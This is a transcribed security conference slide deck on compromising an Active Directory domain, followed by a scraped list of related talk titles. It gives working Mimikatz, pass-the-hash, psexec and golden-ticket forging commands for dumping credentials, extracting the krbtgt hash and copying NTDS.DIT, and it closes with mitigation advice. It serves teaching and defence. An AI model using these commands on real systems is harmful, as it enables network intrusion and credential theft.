Michael Mayer-Gishyan NSA IT Consulting From Zero to Hero. Domain Admin in einem Tag
|
|
- Collin Gilbert
- 8 years ago
- Views:
Transcription
1 Michael Mayer-Gishyan NSA IT Consulting From Zero to Hero Domain Admin in einem Tag
2 Agenda Vita Introduction to NTLM and Kerberos Pass-the-Hash Techniques First Breach Horizontal and vertical Target hopping Credential-Theft and Right-Elevation Total Active Directory Invasion Mitigation, Mitigation, Mitigation Credits
3 Vita Freelancer IT Security Consultant Blue Team / Cyber Defense Microsoft Addict Motorcyclist BBQ Fanatic Fulltime Geek
4 Introduction to NTLM and Kerberos NTLM (NT LAN Manager) Hashed password on Windows Systems Versions: LM, NTLM, NTLMv2 Used as fallback for Kerberos Computer Accounts also have Passwords Authentication Process: User puts in password on local system Password is hashed The hash will be compared with the one from the Local Security Authority If they match, the access is granted
5 Introduction to NTLM and Kerberos Kerberos Can only be used with Active Directory Works with tickets TGT (Ticket Granting Ticket) - Used for accessing the AD TGS (Ticket Granting Service) - Used for accessing a Service Authentication Process (1/2): AS-REQ: Request for a TGT to the KDC (Key Distribution Center) Encrypted with the ekey (Long Term Key/Encryption Key/User Password) This request has the same as the NTLM Hash (with RC4) AS-REP: If valid, KDC sends back a TGT encrypted with the ekey of the krbtgt Account krbtgt = Kerberos TGT Account = KDC (the same on all DCs) Ticket includes a PAC (Privilege Attribute Certificate) which stores all access groups for the user
6 Introduction to NTLM and Kerberos Authentication Process (2/2): TGS-REQ: To access a resource (CIFS, RPC, etc.) a TGS must be requested Includes the TGT and the Hostname for the server which provides the resource TGS-REP: KDC includes the PAC info and encrypts the TGS with the ekey of the target Server The PAC includes the access rights on the destination AP-REQ: User forwards the TGS to the server and it encrypts it If the decryption succeeds, the server knows that the TGS is valid Because only the KDC knows the ekey, it must assume that this information is correct PAC Validation for built-in services appears after 20 Minutes Like CIFS, RPC, DNS etc.
7 What is Pass-the-Hash? Pass-the-Hash uses the Hash instead of the plaintext Password Resources can be accessed without knowing the actual password Where do I find Password Hashes? LSASS.exe (Local Security Authority Security Subsystem) Memory - Also Dump Files and VM Memory Files Registry NTDS.DIT (Complete AD Database on every Domain Controller) RODC (Read-only DC) only store defined credentials Bbb..but why is nobody doing something? It s not a bug, it s a feature! Without, users need to input their password every time a resource is accessed
8 What is Overpass-the-Hash? The same as Pass-The-Hash, only with Kerberos Instead of the password, the NTLM hash will be used to request Tickets A variant is Pass-the-Key RC4 Key = NTLM hash of the password, not salted by the KDC Can be cracked when the password is weak Also AES128 and AES256 keys can be used Hard to crack, salted and 4096 iterations of the PBKDF2 algorithm Where do I find those keys? LSASS.exe (Client) Except for the Protected Users Security Group (Windows 8 and above) KDC (DC)
9 What is Pass-the-Ticket? A Ticket (TGT) can be stolen and reused by anybody AS-REQ and AS-REP will be skipped TGS-REQ and TGS-REP will be granted by the KDC A stolen TGS won t be noticed by the KDC AP-REQ is only between client and target server Must have want Look for them in the RAM Yes, you can also use dumps
10 What is a Golden Ticket? This is the holy grail, the ticket of all tickets! With it you can access everything in AD It is valid for 20 minutes (PAC Validation) But then you can forge another one Okay, okay I am sold, what do I need? The hash of the krbtgt Account It is almost never changed Basically a TGT is only a TGS for the KDC Domain SID, some Groups, a Username
11 What is a Golden Ticket? HOW is this possible???? Every policy is client side enforced Logon hours, Password expiration, Group Memberships, etc. Only after 20 Minutes the PAC is checked with the KDC Within that period you can do anything! Even create valid tickets for non existing User Accounts Silver Tickets A golden Ticket limited to a single server Created by the hash of the Computer Account Mother of all backdoors -> no communication with KDC
12 First Breach First access to the network through: DMZ attack Malware Exploits Social Engineering Backdoors Physical access
13 First Breach Preparations Login with User Account Start - Run powershell. C:\Tools\PowerCat.ps1 Powercat -l -p -v 4444 Loads PS function for PowerCat listener Don t forget the leading dot! This is your attackers window
14 First Breach Control WS over shell whoami hostname dir C:\WINDOWS\SysWoW64\Config Easy Admin-Rights Check. C:\Tools\Invoke-Mimikatz.ps1 Loads PS function for mimikatz Don t forget the leading dot! Invoke-Mimikatz -command "privilege::debug sekurlsa::logonpasswords Cleartext Passwords!!! *evilgrin*
15 First Breach Where to find credentials? LSASS.exe / RAM Saved Passwords Applications Websites RDP files (Decryption is documented) Group Policies (Patched) WIM images / sysprep.xml (Patched) Backups files VM memory files Scheduled Tasks Service Accounts
16 Horizontal and vertical Target hopping Horizontal Check the local Administrator Credentials They are not changed regularly Often they are the same on Clients Vertical Look for credentials on other hosts Deploy a Keylogger Provoke logon by privileged account tskill explorer.exe
17 Credential-Theft and Right-Elevation C:\Tools\Helpdesk-Me.cmd This will do a local logon with the helpdesk user net user helpdesk /domain Gives a overview in which AD groups the user is C:\Tools\mimikatz.exe (Run as Administrator) privilege::debug sekurlsa::logonpasswords Copy the NTLM hash into clipboard sekurlsa::pth /user:helpdesk /domain:evil.corp /ntlm:hash /run cmd.exe Opens shell with injected hash
18 Credential-Theft and Right-Elevation Check this out! whoami klist dir \\sv01\c$ dir \\dc01\c$ psexec \\sv01 cmd.exe
19 Credential-Theft and Right-Elevation Credential search on a higher tier (Server Level) C:\Tools\mimikatz.exe (Run as Administrator) privilege::debug sekurlsa::logonpasswords Service Account found No plaintext passwords because Wdigest is disabled Copy the NTLM hash! sekurlsa::pth /user:highservice /domain:evil.corp /ntlm:hash /run cmd net user highservice /domain Special account is special! dir \\dc01\c$ klist
20 Total Active Directory Invasion Connect to the Domain Controller psexec \\dc01 cmd C:\Tools\mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt kerberos::golden /domain:evil.corp /sid:<sid> /rc4:<hash> /user:administrator /id:500 /groups:500,501,512,513,518,519,520 /ticket: golden.kirbi Copy this file to your workstation copy golden.kirbi \\WS01\C$\Tools\
21 Total Active Directory Invasion WS: C:\Tools\mimikatz.exe Kerberos::ptt yourname.kirbi Note that there is no privilege::debug needed! misc::cmd Injects Golden Ticket into a cmd window Domain wide entrance card to everything! dir \\dc01\c$ dir \\sv01\c$ COPY ALL THE THINGS!!!! NTDS.DIT - Full AD Database IMPLEMENT ALL THE BACKDOORS!!!! Use Silver Tickets
22
23
24 Mitigation, Mitigation, Mitigation What can I do against this dark sorcery? Implement a tight password change routine (1/2) Computer Accounts: 1 Day Default: 30 Days Service Accounts: 3 Months or use (Group) Managed Service Accounts Default: C mon, be honest. Nobody changes them EVER! krbtgt: Every year or when a Domain Admin leaves Default: Once in like years (when upgrading from DFL 2003 to 2008) User Accounts: 90 Days - The shorter the period is, the easier the passwords get Default: 30 Days DSRM (Directory Services Restore Mode): Twice a year - must be synced manually! Default: Never
25 Mitigation, Mitigation, Mitigation Implement a tight password change routine (2/2) Local Administrator Accounts: 30 days Default: Never Use LAPS (Local Administrator Password Solution) by Microsoft Check the logins of privileged accounts Who leaves traces on which host? Use separate Administration Accounts Never use privileged accounts on your client Domain Admins and similar should use dedicated Administration Workstations No Internet Access Separated from the regular client Use stricter Group Policy Settings
26 Mitigation, Mitigation, Mitigation Check misconfiguration and implement a hardening standard Updates and Patching - This is vital to a healthy infrastructure MS Patch new DCs before promoting! Secure your Clients Don t forget the user! Security Awareness Programs Deploy EMET Log PowerShell and CMD execution AppLocker - Application Whitelisting Solution Deploy it in the DMZ and also on the Clients Use simple rules and adopt legacy apps Use Honeypots to deploy fake credentials Could also be done somewhere hidden on the clients
27 Mitigation, Mitigation, Mitigation Use Jump Gates / Bastion Hosts / Admin Terminal Servers Train your Administrators how to use them Implement a very strict Group Policy A loose configured Terminal Server is a Security Breach, not a Gain! Logging Microsoft ATA Automatically detects PtH, PtT, Golden Ticket attacks Uses a lot disk space SIEM Monitor your clients! Use generous thresholds Check Scheduled Tasks, Autoruns and Environmental Variables Name a specialist who is responsible for following daily security breaches
28 Credits Benjamin Delpy / mimikatz Author Alva Skip Duckwall / PtH Expert Joe Bialek / PowerSploit Author & MSRC Nikhil Mittal / Nishang Author & PowerShell Guru Sean Metcalf / AD Security Specialist - adsecurity.org Microsoft / I <3 U, your software keeps me busy My Wife / I <3 U 2, but somewhat different Everybody who contributes in the name of cyber security
29 Thanks for your attention! Free Anti-Spy Webcam Stickers available at my desk
Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection
Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection Sean Metcalf (@PyroTek3) CTO, DAn Solutions sean [@] dansolutions _._com DAnSolutions.com ADSecurity.org ABOUT Chief Technology Officer
More informationRed vs. Blue: Modern Active Directory Attacks, Detection, & Protection
Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection Sean Metcalf (@PyroTek3) CTO, DAn Solutions sean [@] dansolutions _._com http://dansolutions.com http://www.adsecurity.org ABOUT Chief
More informationPass-the-Hash II: Admin s Revenge. Skip Duckwall & Chris Campbell
Pass-the-Hash II: Admin s Revenge Skip Duckwall & Chris Campbell Do you know who I am? Skip Co-presented PTH talk last year at BH, Derbycon http://passing-the-hash.blogspot.com @passingthehash on twitter
More informationmimikatz 2.0 Benjamin DELPY `gentilkiwi`
mimikatz 2.0 Benjamin DELPY `gentilkiwi` Our little story `whoami`, why am I doing this? mimikatz 2.0 & sekurlsa Focus on Windows 8.1 et 2012r2 Kerberos & strong authentication Questions / Answers And
More informationRed vs. Blue: Modern Active Directory Attacks, Detection, and Protection Whitepaper
Red vs. Blue: Modern Active Directory Attacks, Detection, and Protection Whitepaper Author: Sean Metcalf CTO Dan Solutions, Inc. sean@dansolutions.com www.dansolutions.com ADSecurity.org Contents Introduction...
More informationWATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING
WATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING Authors: Tal Be ery, Sr. Security Research Manager, Microsoft Michael Cherny, Sr. Security Researcher, Microsoft November
More informationHow to Efficiently Protect Active Directory from Credential Theft & Large Scale Compromise
How to Efficiently Protect Active Directory from Credential Theft & Large Scale Compromise An Approach Based on Real-World Expertise Friedwart Kuhn, fkuhn@ernw.de Digital unterschrieben von Friedwart Kuhn
More informationAgenda. Red Team Difference to a Pen Test Common RT Techniques Blue Team
Red Teaming Agenda Red Team Difference to a Pen Test Common RT Techniques Blue Team Disclaimer Red Teaming is a contentious term with no set definition Conceptions vary and can be situated on a scale from
More informationFive Steps to Improve Internal Network Security. Chattanooga ISSA
Five Steps to Improve Internal Network Security Chattanooga ISSA 1 Find Me AverageSecurityGuy.info @averagesecguy stephen@averagesecurityguy.info github.com/averagesecurityguy ChattSec.org 2 Why? The methodical
More informationAbusing Microsoft Kerberos sorry you guys don t get it. by Alva `Skip` DUCKWALL & Benjamin DELPY
Abusing Microsoft Kerberos sorry you guys don t get it by Alva `Skip` DUCKWALL & Benjamin DELPY `whoami` - Skip Alva `Skip` DUCKWALL @ passingthehash http://passing-the-hash.blogspot.com author of papers
More informationWho DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store
Who DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store Mike Middleton Justin Prosco Mandiant, A FireEye Company Mike Middleton Principal Consultant Joined
More informationInternal Penetration Test
Internal Penetration Test Agenda Time Agenda Item 10:00 10:15 Introduction 10:15 12:15 Seminar: Web Application Penetration Test 12:15 12:30 Break 12:30 13:30 Seminar: Social Engineering Test 13:30 15:00
More informationWindows Attack - Gain Enterprise Admin Privileges in 5 Minutes
Windows Attack - Gain Enterprise Admin Privileges in 5 Minutes Compass Security AG, Daniel Stirnimann Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel +41 55-214 41 60 Fax +41
More informationManaging Local Administrator Passwords with LAPS 10/14/2015 PENN STATE SECURITY CONFERENCE
Managing Local Administrator Passwords with LAPS 2015 PENN STATE SECURITY CONFERENCE DAN BARR DRB45@PSU.EDU SYSTEMS ADMINISTRATOR, APPLIED RESEARCH LABORATORY The Shared Password Threat Shared passwords
More informationWindows passwords security
IT Advisory Windows passwords security ADVISORY WHOAMI 2 Agenda The typical windows environment Local passwords Secure storage mechanims: Syskey & SAM File Password hashing & Cracking: LM & NTLM Into the
More informationProtection from Kerberos Golden Ticket
Protection from Kerberos Golden Ticket Mitigating pass the ticket on Active Directory CERT-EU Security White Paper 2014-07 1 Introduction Kerberos authentication protocol is the preferred authentication
More informationTaming the beast : Assess Kerberos-protected networks
Taming the beast : Assess Kerberos-protected networks [ Work in progress Black Hat EU 2009] Emmanuel Bouillon Commissariat à l'energie Atomique, Centre DAM-Île de France, Bruyères-le-Châtel 91297 Arpajon
More informationIntroduction to Computer Security
Introduction to Computer Security Authentication and Access Control Pavel Laskov Wilhelm Schickard Institute for Computer Science Resource access: a big picture 1. Identification Which object O requests
More informationProtecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
More informationWindows Server 2008/2012 Server Hardening
Account Policies Enforce password history 24 Maximum Password Age - 42 days Minimum Password Age 2 days Minimum password length - 8 characters Password Complexity - Enable Store Password using Reversible
More informationFORENSIC ARTIFACTS FROM A PASS THE HASH (PTH) ATTACK BY: GERARD LAYGUI
FORENSIC ARTIFACTS FROM A PASS THE HASH (PTH) ATTACK BY: GERARD LAYGUI DISCLAIMER: THE VIEWS AND OPINIONS EXPRESSED IN THIS PRESENTATION ARE THOSE OF THE AUTHOR S AND DOES NOT NECESSARILY REPRESENT THE
More information4.2: Kerberos Kerberos V4 Kerberos V5. Chapter 5: Security Concepts for Networks. Lehrstuhl für Informatik 4 Kommunikation und verteilte Systeme
Chapter 2: Security Techniques Background Chapter 3: Security on Network and Transport Layer Chapter 4: Security on the Application Layer Secure Applications Network Authentication Service: Kerberos 4.2:
More informationqliqdirect Active Directory Guide
qliqdirect Active Directory Guide qliqdirect is a Windows Service with Active Directory Interface. qliqdirect resides in your network/server and communicates with qliqsoft cloud servers securely. qliqdirect
More informationWHY ATTACKER TOOLSETS DO WHAT THEY DO
WHY ATTACKER TOOLSETS DO WHAT THEY DO (or.. Reasons they just keep working ) Matt McCormack OVER THE LAST YEAR 50+ engagements Good chunk of different verticals, industries, etc. Varying qualities and
More informationIWA AUTHENTICATION FUNDAMENTALS AND DEPLOYMENT GUIDELINES
IWA AUTHENTICATION FUNDAMENTALS AND DEPLOYMENT GUIDELINES TECHNICAL BRIEF INTRODUCTION The purpose of this document is to explain how Integrated Windows Authentication (IWA) works with the ProxySG appliance,
More informationCS 356 Lecture 25 and 26 Operating System Security. Spring 2013
CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control
More informationInformation Assurance Directorate
National Security Agency/Central Security Service Information Assurance Directorate Reducing the Effectiveness of Pass-the-Hash November 19, 2013 Revision 1 A product of the Network Components and Applications
More informationMitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques. Mitigating the risk of lateral movement and privilege escalation
Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques Mitigating the risk of lateral movement and privilege escalation Mitigating Pass-the-Hash (PtH) Attacks and Other Credential
More informationPass-the-Hash: How Attackers Spread and How to Stop Them
Pass-the-Hash: How Attackers Spread and How to Stop Them SESSION ID: HTA-W03 Mark Russinovich Technical Fellow Microsoft Corporation Nathan Ide Principal Development Lead Microsoft Corporation Pass-the-Hash:
More informationKerberos. Public domain image of Heracles and Cerberus. From an Attic bilingual amphora, 530 520 BC. From Italy (?).
Kerberos Public domain image of Heracles and Cerberus. From an Attic bilingual amphora, 530 520 BC. From Italy (?). 1 Kerberos Kerberos is an authentication protocol and a software suite implementing this
More informationIntroduction to Computer Security
Introduction to Computer Security Identification and Authentication Pavel Laskov Wilhelm Schickard Institute for Computer Science Resource access: a big picture 1. Identification Which object O requests
More informationBy Skip Duckwall and Chris Campbell
By Skip Duckwall and Chris Campbell for Blackhat USA 2013 Introduction User credentials are one of the most powerful items an attacker can obtain. Single-factor, or passwordbased credentials are dangerous
More informationILTA HANDS ON Securing Windows 7
Securing Windows 7 8/23/2011 Table of Contents About this lab... 3 About the Laboratory Environment... 4 Lab 1: Restricting Users... 5 Exercise 1. Verify the default rights of users... 5 Exercise 2. Adding
More informationAdditional Security Considerations and Controls for Virtual Private Networks
CYBER SECURITY OPERATIONS CENTRE APRIL 2013 (U) LEGAL NOTICE: THIS PUBLICATION HAS BEEN PRODUCED BY THE DEFENCE SIGNALS DIRECTORATE (DSD), ALSO KNOWN AS THE AUSTRALIAN SIGNALS DIRECTORATE (ASD). ALL REFERENCES
More informationMicrosoft Auditing Events for Windows 2000/2003 Active Directory. By Ed Ziots Version 1.6 9/20/2005
Microsoft Auditing Events for Windows 2000/2003 Active Directory. By Ed Ziots Version 1.6 9/20/2005 Revision 1.3: Cleaned up resources and added additional detail into each auditing table. Revision 1.4:
More informationExploiting Transparent User Identification Systems
Exploiting Transparent User Identification Systems Wayne Murphy Benjamin Burns Version 1.0a 1 CONTENTS 1.0 Introduction... 3 1.1 Project Objectives... 3 2.0 Brief Summary of Findings... 4 3.0 Background
More informationDefense Security Service Office of the Designated Approving Authority Standardization of Baseline Technical Security Configurations
Defense Security Service Office of the Designated Approving Authority Standardization of Baseline Technical Security Configurations March 2009 Version 2.2 This page intentionally left blank. 2 1. Introduction...4
More informationTAKING SECURITY TESTING TO THE NEXT LEVEL 5 MAY 2014 STAN HEGT
+ = TAKING SECURITY TESTING TO THE NEXT LEVEL 5 MAY 2014 STAN HEGT HAVE YOU EVER ENCOUNTERED AN ADVERSARY THAT RAN NESSUS FROM A MEETING ROOM? PENETRATION TESTING vs RED TEAMING Penetration Testing Red
More informationWhy You Need to Detect More Than PtH. Matt Hathaway, Senior Product Manager, Rapid7 Jeff Myers, Lead Software Engineer, Rapid7
Why You Need to Detect More Than PtH Matt Hathaway, Senior Product Manager, Rapid7 Jeff Myers, Lead Software Engineer, Rapid7 Who We Are! Matt Hathaway Senior Product Manager for Rapid7 UserInsight Former
More informationMS-50292 - MCITP: Windows 7 Enterprise Desktop Support Technician Boot Camp
MS-50292 - MCITP: Windows 7 Enterprise Desktop Support Technician Boot Camp Table of Contents Introduction Audience At Completion Prerequisites Microsoft Certified Professional Exams Student Materials
More informationNIST PKI 06: Integrating PKI and Kerberos (updated April 2007) Jeffrey Altman
NIST PKI 06: Integrating PKI and Kerberos (updated April 2007) Jeffrey Altman The Slow Convergence of PKI and Kerberos At Connectathon 1995 Dan Nessett of Sun Microsystems was quoted saying Kerberos will
More informationUsing Integrated Windows Authentication with Websense Content Gateway, v7.6
Using Integrated Windows Authentication with Websense Content Gateway, v7.6 Websense Support Webinar August 2011 web security data security email security Support Webinars 2009 Websense, Inc. All rights
More informationXerox DocuShare Security Features. Security White Paper
Xerox DocuShare Security Features Security White Paper Xerox DocuShare Security Features Businesses are increasingly concerned with protecting the security of their networks. Any application added to a
More informationSecurity Overview for Windows Vista. Bob McCoy, MCSE, CISSP/ISSAP Technical Account Manager Microsoft Corporation
Security Overview for Windows Vista Bob McCoy, MCSE, CISSP/ISSAP Technical Account Manager Microsoft Corporation Agenda User and group changes Encryption changes Audit changes User rights New and modified
More informationHow To - Implement Clientless Single Sign On Authentication in Single Active Directory Domain Controller Environment
How To - Implement Clientless Single Sign On Authentication in Single Active Directory Domain Controller Environment How To - Implement Clientless Single Sign On Authentication with Active Directory Applicable
More informationHow To - Implement Single Sign On Authentication with Active Directory
How To - Implement Single Sign On Authentication with Active Directory Applicable to English version of Windows This article describes how to implement single sign on authentication with Active Directory
More informationPenetration Test Report
Penetration Test Report MegaCorp One August 10 th, 2013 Offensive Security Services, LLC 19706 One Norman Blvd. Suite B #253 Cornelius, NC 28031 United States of America Tel: 1-402-608-1337 Fax: 1-704-625-3787
More informationComputer Security: Principles and Practice
Computer Security: Principles and Practice Chapter 24 Windows and Windows Vista Security First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Windows and Windows Vista Security
More informationSESSION 507 Thursday, March 26, 11:15 AM - 12:15 PM Track: Desktop Support
SESSION 507 Thursday, March 26, 11:15 AM - 12:15 PM Track: Desktop Support Desktop Support and Data Breaches: The Unknown Dangers Bryan Hood Senior Solutions Engineer, Bomgar bhood@bomgar.com Session Description
More informationBypassing Local Windows Authentication to Defeat Full Disk Encryption. Ian Haken
Bypassing Local Windows Authentication to Defeat Full Disk Encryption Ian Haken Who Am I? Currently a security researcher at Synopsys, working on application security tools and Coverity s static analysis
More informationStill Passing the Hash 15 Years Later
Still Passing the Hash 15 Years Later Using the Keys to the Kingdom to Access All Your Data Alva Skip Duckwall Chris Campbell Help Us Get Better! Please Fill Out The Speaker Surveys! Do You Know Who I
More informationFive Steps to Improve Internal Network Security. Chattanooga Information security Professionals
Five Steps to Improve Internal Network Security Chattanooga Information security Professionals Who Am I? Security Analyst: Sword & Shield Blogger: averagesecurityguy.info Developer: github.com/averagesecurityguy
More informationInstallation Manual v2.0.0
Installation Manual v2.0.0 Contents ResponseLogic Install Guide v2.0.0 (Command Prompt Install)... 3 Requirements... 4 Installation Checklist:... 4 1. Download and Unzip files.... 4 2. Confirm you have
More informationMore Than You Ever Wanted to Know about NT Login Authentication
A Perspective On Practical Security 2000 More Than You Ever Wanted to Know about NT Login Authentication SystemExperts Corporation Philip C. Cox & Paul B. Hill Abstract The login process is the user's
More informationDell Compellent Storage Center
Dell Compellent Storage Center Active Directory Integration Best Practices Guide Dell Compellent Technical Solutions Group January, 2013 THIS BEST PRACTICES GUIDE IS FOR INFORMATIONAL PURPOSES ONLY, AND
More informationNetwork Assessment. Prepared For: Prospect Or Customer Prepared By: Your Company Name
Network Assessment Prepared For: Prospect Or Customer Prepared By: Your Company Name Environment Risk and Issue Score Issue Review Next Steps Agenda Environment - Overview Domain Domain Controllers 4 Number
More informationPass-the-Hash. Solution Brief
Solution Brief What is Pass-the-Hash? The tools and techniques that hackers use to infiltrate an organization are constantly evolving. Credential theft is a consistent concern as compromised credentials
More informationMCTS Guide to Microsoft Windows 7. Chapter 7 Windows 7 Security Features
MCTS Guide to Microsoft Windows 7 Chapter 7 Windows 7 Security Features Objectives Describe Windows 7 Security Improvements Use the local security policy to secure Windows 7 Enable auditing to record security
More information05 June 2015 A-000061-MW TLP: GREEN
05 June 2015 Alert Number A-000061-MW Please contact the FBI with any questions related to this FLASH Report at either your local Cyber Task Force or FBI CYWATCH. Email: cywatch@ic.fbi.gov Phone: 1-855-292-3937
More informationExecuTrain Course Outline Configuring & Troubleshooting Windows Server 2008 Active Directory Domain Services MOC 6425C 5 Days
ExecuTrain Course Outline Configuring & Troubleshooting Windows Server 2008 Active Directory Domain Services MOC 6425C 5 Days Introduction This five-day instructor-led course provides in-depth training
More informationPineApp Surf-SeCure Quick
PineApp Surf-SeCure Quick Installation Guide September 2010 WEB BASED INSTALLATION SURF-SECURE AS PROXY 1. Once logged in, set the appliance s clock: a. Click on the Edit link under Time-Zone section.
More informationVISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE. Summary. Distribution and Installation
VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE Distribution: Merchants, Acquirers Who should read this: Information security, incident response, cyber intelligence staff Summary Kuhook
More informationActive Directory basics. Explaining Active Directory to IT professionals
1 Contents Introduction.........................................................................3 Active Directory and its components................................................ 4 Domain Controllers..............................................................
More informationPassword Reset PRO. Quick Setup Guide for Single Server or Two-Tier Installation
Password Reset PRO Quick Setup Guide for Single Server or Two-Tier Installation This guide covers the features and settings available in Password Reset PRO version 3.x.x. Please read this guide completely
More informationNetBrain Security Guidance
NetBrain Security Guidance 1. User Authentication and Authorization 1.1. NetBrain Components NetBrain Enterprise Server includes five components: Customer License Server (CLS), Workspace Server (WSS),
More informationHELP DOCUMENTATION E-SSOM INSTALLATION GUIDE
HELP DOCUMENTATION E-SSOM INSTALLATION GUIDE Copyright 1998-2013 Tools4ever B.V. All rights reserved. No part of the contents of this user guide may be reproduced or transmitted in any form or by any means
More informationHow To Secure Your Data Center From Hackers
Xerox DocuShare Private Cloud Service Security White Paper Table of Contents Overview 3 Adherence to Proven Security Practices 3 Highly Secure Data Centers 4 Three-Tier Architecture 4 Security Layers Safeguard
More informationConfigure the Application Server User Account on the Domain Server
How to Set up Kerberos Summary This guide guide provides the steps required to set up Kerberos Configure the Application Server User Account on the Domain Server The following instructions are based on
More informationTopEase Single Sign On Windows AD
TopEase Single Sign On Windows AD Version Control: Version Status Datum / Kurzzeichen Begründung 1.0 Final 09.09.12 / gon New template and logo Copyright: This document is the property of Business-DNA
More informationData Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
More informationConfiguring and Troubleshooting Windows 2008 Active Directory Domain Services
About this Course Configuring and Troubleshooting Windows This five-day instructor-led course provides in-depth training on implementing, configuring, managing and troubleshooting Active Directory Domain
More informationConfiguring and Troubleshooting Windows Server 2008 Active Directory Domain Services
Active Directory About this Course This five-day instructor-led course provides in-depth training on implementing, configuring, managing and troubleshooting (AD DS) in and R2 environments. It covers core
More informationConfigure and enable remote access for windows operating system
Configure and enable remote access for windows operating system There can be several reasons on why you cannot access a remote computer in your network. In this guide we will focus on troubleshooting the
More informationUser Guide. Version R91. English
AuthAnvil User Guide Version R91 English August 25, 2015 Agreement The purchase and use of all Software and Services is subject to the Agreement as defined in Kaseya s Click-Accept EULATOS as updated from
More information4cast Server Specification and Installation
4cast Server Specification and Installation Version 2015.00 10 November 2014 Innovative Solutions for Education Management www.drakelane.co.uk System requirements Item Minimum Recommended Operating system
More informationEylean server deployment guide
Eylean server deployment guide Contents 1 Minimum software and hardware requirements... 2 2 Setting up the server using Eylean.Server.Setup.exe wizard... 2 3 Manual setup with Windows authentication -
More informationStealing credentials for impersonation
Stealing credentials for impersonation Emmanuel Bouillon manu@veryopenid.net October 29, 2010 Disclaimer Introduction This expresses my own views and does not involve my previous, current and future employers.
More informationQliqDIRECT Active Directory Guide
QliqDIRECT Active Directory Guide QliqDIRECT is a Windows Service with Active Directory Interface. QliqDIRECT resides in your network/server and communicates with Qliq cloud servers securely. QliqDIRECT
More informationπωχ Notes on Domino Black Hat Las Vegas 2003 Aldora Louw PricewaterhouseCoopers
Notes on Domino Black Hat Las Vegas 2003 Aldora Louw PricewaterhouseCoopers Lotus Domino is inherently secure...a Misconception!!! Security is Not Automatic!!!! Slide #2 Security Requires Planning Design
More informationNetwork Architecture & Active Directory Considerations for the PI System. Bryan Owen - OSIsoft Joel Langill - SCADAhacker
Network Architecture & Active Directory Considerations for the PI System By: Bryan Owen - OSIsoft Joel Langill - SCADAhacker Agenda Moore s Law Network Architecture Domain Services in a DMZ 2 HD Moore
More informationRSA Security Analytics
RSA Security Analytics Event Source Log Configuration Guide Microsoft SQL Server Last Modified: Thursday, July 30, 2015 Event Source Product Information: Vendor: Microsoft Event Source: SQL Server Versions:
More informationThick Client Application Security
Thick Client Application Security Arindam Mandal (arindam.mandal@paladion.net) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
More informationCourse 6425C: Configuring and Troubleshooting Windows Server 2008 Active Directory Domain Services
www.etidaho.com (208) 327-0768 Course 6425C: Configuring and Troubleshooting Windows Server 2008 Active Directory Domain Services 5 Days About this Course This five-day instructor-led course provides in-depth
More informationTroubleshooting Kerberos Encryption Types
Troubleshooting Kerberos Encryption Types Author: Nathan Park (npark@pingidentity.com) Last update: 2013.12.12 Summary: Troubleshooting Kerberos encryption types can be made easier with a few widely-available
More information13 Ways Through A Firewall
Industrial Control Systems Joint Working Group 2012 Fall Meeting 13 Ways Through A Firewall Andrew Ginter Director of Industrial Security Waterfall Security Solutions Proprietary Information -- Copyright
More informationConfiguring and Troubleshooting Windows Server 2008 Active Directory Domain Services
Course 6425C: Configuring and Troubleshooting Windows Server 2008 Active Directory Domain Services Course Details Course Outline Module 1: Introducing Active Directory Domain Services This module provides
More informationContents. Supported Platforms. Event Viewer. User Identification Using the Domain Controller Security Log. SonicOS
SonicOS User Identification Using the Domain Controller Security Log Contents Supported Platforms... 1 Event Viewer... 1 Configuring Group Policy to Enable Logon Audit... 2 Events in Security Log... 4
More informationAlert (TA14-212A) Backoff Point-of-Sale Malware
Alert (TA14-212A) Backoff Point-of-Sale Malware Original release date: July 31, 2014 Systems Affected Point-of-Sale Systems Overview This advisory was prepared in collaboration with the National Cybersecurity
More informationPassword Reset PRO INSTALLATION GUIDE
Password Reset PRO INSTALLATION GUIDE This guide covers the new features and settings available in Password Reset PRO. Please read this guide completely to ensure a trouble-free installation. March 2009
More informationAPT Advanced Persistent Threat Time to rethink?
APT Advanced Persistent Threat Time to rethink? 23 November 2012 Gergely Tóth Senior Manager, Security & Privacy Agenda APT examples How to get inside? Remote control Once we are inside Conclusion 2 APT
More informationIceWarp Server - SSO (Single Sign-On)
IceWarp Server - SSO (Single Sign-On) Probably the most difficult task for me is to explain the new SSO feature of IceWarp Server. The reason for this is that I have only little knowledge about it and
More informationArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
More informationKerberos authentication made easy on OpenVMS
Kerberos authentication made easy on OpenVMS Author: Srinivasa Rao Yarlagadda yarlagadda-srinivasa.rao@hp.com Co-Author: Rupesh Shantamurty rupeshs@hp.com OpenVMS Technical Journal V18 Table of contents
More informationOld Web Shells, New Tricks
